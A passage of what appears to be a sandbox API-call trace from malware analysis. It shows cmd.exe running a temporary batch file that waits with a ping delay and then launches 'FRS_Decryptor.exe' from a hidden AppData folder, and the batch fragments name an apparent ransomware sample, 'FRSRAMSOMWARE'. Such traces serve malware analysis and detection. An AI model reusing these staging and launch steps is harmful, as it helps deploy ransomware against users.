(ExeName=".") returned 1 [0058.163] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0058.163] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0058.163] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0058.163] GetLastError () returned 0x2 [0058.163] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0058.163] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd5a170 [0058.163] FindClose (in: hFindFile=0xd5a170 | out: hFindFile=0xd5a170) returned 1 [0058.163] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0058.163] GetLastError () returned 0x2 [0058.163] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd5a0b0 [0058.163] FindClose (in: hFindFile=0xd5a0b0 | out: hFindFile=0xd5a0b0) returned 1 [0058.163] GetFileType (hFile=0x28) returned 0x2 [0058.163] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0058.163] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xc8efb4 | out: lpMode=0xc8efb4) returned 1 [0058.163] _dup (_FileHandle=1) returned 3 [0058.163] _close (_FileHandle=1) returned 0 [0058.163] _wcsicmp (_String1="nul", _String2="con") returned 11 [0058.164] CreateFileW (lpFileName="nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0xc8ef94, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28 [0058.164] _open_osfhandle (_OSFileHandle=0x28, _Flags=8) returned 1 [0058.164] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0058.164] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0058.164] SetErrorMode (uMode=0x0) returned 0x0 [0058.164] SetErrorMode (uMode=0x1) returned 0x0 [0058.164] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd8b938, lpFilePart=0xc8e8b4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8e8b4*="Desktop") returned 0x1c [0058.164] SetErrorMode (uMode=0x0) returned 0x1 [0058.164] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0058.164] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0058.164] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0058.164] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0058.164] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0058.164] GetLastError () returned 0x2 [0058.164] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0058.164] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd5a0b0 [0058.164] FindClose (in: hFindFile=0xd5a0b0 | out: hFindFile=0xd5a0b0) returned 1 [0058.164] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0058.165] GetLastError () returned 0x2 [0058.165] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59b30 [0058.165] FindClose (in: hFindFile=0xd59b30 | out: hFindFile=0xd59b30) returned 1 [0058.165] GetConsoleTitleW (in: lpConsoleTitle=0xc8eb3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0058.165] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ea68, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ea4c | out: lpAttributeList=0xc8ea68, lpSize=0xc8ea4c) returned 1 [0058.165] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ea68, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ea54, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ea68, lpPreviousValue=0x0) returned 1 [0058.165] GetStartupInfoW (in: lpStartupInfo=0xc8eaa0 | out: lpStartupInfo=0xc8eaa0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0058.165] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0058.165] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0058.165] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0058.165] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0058.165] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0058.165] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0058.165] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0058.165] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0058.165] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0058.165] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0058.165] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0058.165] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0058.165] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0058.165] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0058.165] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0058.165] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0058.165] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0058.165] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0058.165] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0058.165] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0058.165] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0058.165] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0058.165] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0058.165] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0058.165] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0058.165] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0058.165] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0058.165] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0058.165] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0058.165] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0058.166] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0058.166] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0058.166] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0058.166] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0058.166] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0058.166] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0058.166] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0058.166] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0058.166] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0058.166] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0058.166] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0058.166] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0058.166] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 10 127.1", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8e9f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 10 127.1", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ea3c | out: lpCommandLine="ping -n 10 127.1", lpProcessInformation=0xc8ea3c*(hProcess=0x2a0, hThread=0x348, dwProcessId=0xaf8, dwThreadId=0xb08)) returned 1 [0058.169] CloseHandle (hObject=0x348) returned 1 [0058.169] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0058.169] GetEnvironmentStringsW () returned 0xd30508* [0058.169] FreeEnvironmentStringsA (penv="=") returned 1 [0058.169] WaitForSingleObject (hHandle=0x2a0, dwMilliseconds=0xffffffff) returned 0x0 [0067.935] GetExitCodeProcess (in: hProcess=0x2a0, lpExitCode=0xc8e9d4 | out: lpExitCode=0xc8e9d4*=0x0) returned 1 [0067.935] CloseHandle (hObject=0x2a0) returned 1 [0067.935] _vsnwprintf (in: _Buffer=0xc8eabc, _BufferCount=0x13, _Format="%08X", _ArgList=0xc8e9dc | out: _Buffer="00000000") returned 8 [0067.935] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0067.935] GetEnvironmentStringsW () returned 0xd2c668* [0067.935] FreeEnvironmentStringsA (penv="=") returned 1 [0067.935] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0067.935] GetEnvironmentStringsW () returned 0xd30508* [0067.935] FreeEnvironmentStringsA (penv="=") returned 1 [0067.935] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ea68 | out: lpAttributeList=0xc8ea68) [0067.935] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0067.935] _close (_FileHandle=3) returned 0 [0067.936] _get_osfhandle (_FileHandle=1) returned 0x28 [0067.936] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0067.936] _get_osfhandle (_FileHandle=1) returned 0x28 [0067.936] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0067.936] _get_osfhandle (_FileHandle=0) returned 0x24 [0067.936] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0067.936] SetConsoleInputExeNameW () returned 0x1 [0067.936] GetConsoleOutputCP () returned 0x1b5 [0067.937] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0067.937] SetThreadUILanguage (LangId=0x0) returned 0x409 [0067.937] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0067.937] _open_osfhandle (_OSFileHandle=0x2f0, _Flags=8) returned 3 [0067.937] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0067.937] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=2442, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0067.937] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0067.937] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0xe4, lpOverlapped=0x0) returned 1 [0067.938] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=2477, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0067.938] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n\r\n.png\r\n\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\np\\FRS.exe\"\r\n") returned 35 [0067.938] GetFileType (hFile=0x2f0) returned 0x1 [0067.938] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0067.938] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0067.938] GetEnvironmentVariableW (in: lpName="MYFILES", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F") returned 0x2f [0067.938] _tell (_FileHandle=3) returned 2477 [0067.938] _close (_FileHandle=3) returned 0 [0067.938] _wcsicmp (_String1="start", _String2="DIR") returned 15 [0067.938] _wcsicmp (_String1="start", _String2="ERASE") returned 14 [0067.938] _wcsicmp (_String1="start", _String2="DEL") returned 15 [0067.938] _wcsicmp (_String1="start", _String2="TYPE") returned -1 [0067.938] _wcsicmp (_String1="start", _String2="COPY") returned 16 [0067.938] _wcsicmp (_String1="start", _String2="CD") returned 16 [0067.938] _wcsicmp (_String1="start", _String2="CHDIR") returned 16 [0067.938] _wcsicmp (_String1="start", _String2="RENAME") returned 1 [0067.938] _wcsicmp (_String1="start", _String2="REN") returned 1 [0067.938] _wcsicmp (_String1="start", _String2="ECHO") returned 14 [0067.938] _wcsicmp (_String1="start", _String2="SET") returned 15 [0067.938] _wcsicmp (_String1="start", _String2="PAUSE") returned 3 [0067.938] _wcsicmp (_String1="start", _String2="DATE") returned 15 [0067.938] _wcsicmp (_String1="start", _String2="TIME") returned -1 [0067.938] _wcsicmp (_String1="start", _String2="PROMPT") returned 3 [0067.939] _wcsicmp (_String1="start", _String2="MD") returned 6 [0067.939] _wcsicmp (_String1="start", _String2="MKDIR") returned 6 [0067.939] _wcsicmp (_String1="start", _String2="RD") returned 1 [0067.939] _wcsicmp (_String1="start", _String2="RMDIR") returned 1 [0067.939] _wcsicmp (_String1="start", _String2="PATH") returned 3 [0067.939] _wcsicmp (_String1="start", _String2="GOTO") returned 12 [0067.939] _wcsicmp (_String1="start", _String2="SHIFT") returned 12 [0067.939] _wcsicmp (_String1="start", _String2="CLS") returned 16 [0067.939] _wcsicmp (_String1="start", _String2="CALL") returned 16 [0067.939] _wcsicmp (_String1="start", _String2="VERIFY") returned -3 [0067.939] _wcsicmp (_String1="start", _String2="VER") returned -3 [0067.939] _wcsicmp (_String1="start", _String2="VOL") returned -3 [0067.939] _wcsicmp (_String1="start", _String2="EXIT") returned 14 [0067.939] _wcsicmp (_String1="start", _String2="SETLOCAL") returned 15 [0067.939] _wcsicmp (_String1="start", _String2="ENDLOCAL") returned 14 [0067.939] _wcsicmp (_String1="start", _String2="TITLE") returned -1 [0067.939] _wcsicmp (_String1="start", _String2="START") returned 0 [0067.939] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0067.939] GetStdHandle (nStdHandle=0xfffffff6) returned 0x24 [0067.939] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0067.939] GetStdHandle (nStdHandle=0xfffffff4) returned 0x2c [0067.939] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0067.939] SetErrorMode (uMode=0x0) returned 0x0 [0067.939] SetErrorMode (uMode=0x1) returned 0x0 [0067.939] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\.", nBufferLength=0x208, lpBuffer=0xd61410, lpFilePart=0xc725dc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F", lpFilePart=0xc725dc*="qb1143663.0F") returned 0x2f [0067.939] SetErrorMode (uMode=0x0) returned 0x1 [0067.939] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\.") returned 1 [0067.939] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0067.939] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0067.939] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\FRS_Decryptor.exe", fInfoLevelId=0x1, lpFindFileData=0xc72388, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc72388) returned 0xd59ff0 [0067.940] FindClose (in: hFindFile=0xd59ff0 | out: hFindFile=0xd59ff0) returned 1 [0067.940] GetStartupInfoW (in: lpStartupInfo=0xc728e8 | out: lpStartupInfo=0xc728e8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0067.940] InitializeProcThreadAttributeList (in: lpAttributeList=0x0, dwAttributeCount=0x2, dwFlags=0x0, lpSize=0xc72878 | out: lpAttributeList=0x0, lpSize=0xc72878) returned 0 [0067.940] GetLastError () returned 0x7a [0067.940] InitializeProcThreadAttributeList (in: lpAttributeList=0xd76658, dwAttributeCount=0x2, dwFlags=0x0, lpSize=0xc72878 | out: lpAttributeList=0xd76658, lpSize=0xc72878) returned 1 [0067.940] UpdateProcThreadAttribute (in: lpAttributeList=0xd76658, dwFlags=0x0, Attribute=0x60001, lpValue=0xc7289c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xd76658, lpPreviousValue=0x0) returned 1 [0067.940] CreateProcessW (in: lpApplicationName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\FRS_Decryptor.exe", lpCommandLine="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\FRS_Decryptor.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80410, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0xc728a0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x28, hStdError=0x2c), lpProcessInformation=0xc7288c | out: lpCommandLine="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\FRS_Decryptor.exe ", lpProcessInformation=0xc7288c*(hProcess=0x2a0, hThread=0x2f0, dwProcessId=0x94c, dwThreadId=0x510)) returned 1 [0067.954] DeleteProcThreadAttributeList (in: lpAttributeList=0xd76658 | out: lpAttributeList=0xd76658) [0067.954] ResumeThread (hThread=0x2f0) returned 0x0 [0067.954] CloseHandle (hObject=0x2f0) returned 1 [0067.954] CloseHandle (hObject=0x2a0) returned 1 [0067.954] _get_osfhandle (_FileHandle=1) returned 0x28 [0067.954] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0067.964] _get_osfhandle (_FileHandle=1) returned 0x28 [0067.964] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0067.964] _get_osfhandle (_FileHandle=0) returned 0x24 [0067.964] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0067.964] SetConsoleInputExeNameW () returned 0x1 [0067.964] GetConsoleOutputCP () returned 0x1b5 [0067.964] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0067.964] SetThreadUILanguage (LangId=0x0) returned 0x409 [0067.965] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0067.965] _open_osfhandle (_OSFileHandle=0x2a0, _Flags=8) returned 3 [0067.965] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0067.965] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2477, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0067.965] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0067.965] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0xc1, lpOverlapped=0x0) returned 1 [0067.965] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2485, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0067.965] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n\r\n.png\r\n\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\np\\FRS.exe\"\r\n") returned 8 [0067.965] GetFileType (hFile=0x2a0) returned 0x1 [0067.965] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0067.965] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0067.965] _tell (_FileHandle=3) returned 2485 [0067.965] _close (_FileHandle=3) returned 0 [0067.965] _wcsicmp (_String1="goto", _String2="DIR") returned 3 [0067.965] _wcsicmp (_String1="goto", _String2="ERASE") returned 2 [0067.965] _wcsicmp (_String1="goto", _String2="DEL") returned 3 [0067.966] _wcsicmp (_String1="goto", _String2="TYPE") returned -13 [0067.966] _wcsicmp (_String1="goto", _String2="COPY") returned 4 [0067.966] _wcsicmp (_String1="goto", _String2="CD") returned 4 [0067.966] _wcsicmp (_String1="goto", _String2="CHDIR") returned 4 [0067.966] _wcsicmp (_String1="goto", _String2="RENAME") returned -11 [0067.966] _wcsicmp (_String1="goto", _String2="REN") returned -11 [0067.966] _wcsicmp (_String1="goto", _String2="ECHO") returned 2 [0067.966] _wcsicmp (_String1="goto", _String2="SET") returned -12 [0067.966] _wcsicmp (_String1="goto", _String2="PAUSE") returned -9 [0067.966] _wcsicmp (_String1="goto", _String2="DATE") returned 3 [0067.966] _wcsicmp (_String1="goto", _String2="TIME") returned -13 [0067.966] _wcsicmp (_String1="goto", _String2="PROMPT") returned -9 [0067.966] _wcsicmp (_String1="goto", _String2="MD") returned -6 [0067.966] _wcsicmp (_String1="goto", _String2="MKDIR") returned -6 [0067.966] _wcsicmp (_String1="goto", _String2="RD") returned -11 [0067.966] _wcsicmp (_String1="goto", _String2="RMDIR") returned -11 [0067.966] _wcsicmp (_String1="goto", _String2="PATH") returned -9 [0067.966] _wcsicmp (_String1="goto", _String2="GOTO") returned 0 [0067.966] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0067.966] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8eb00, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0067.966] _open_osfhandle (_OSFileHandle=0x2a0, _Flags=8) returned 3 [0067.966] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0067.966] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2485, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0067.966] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0067.966] GetFileSize (in: hFile=0x2a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa6e [0067.966] _wcsnicmp (_String1="4", _String2=":EOF", _MaxCount=0x4) returned -6 [0067.966] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0067.966] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0067.966] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0067.966] GetFileType (hFile=0x2a0) returned 0x1 [0067.966] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0067.967] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8eb6c, lpOverlapped=0x0 | out: 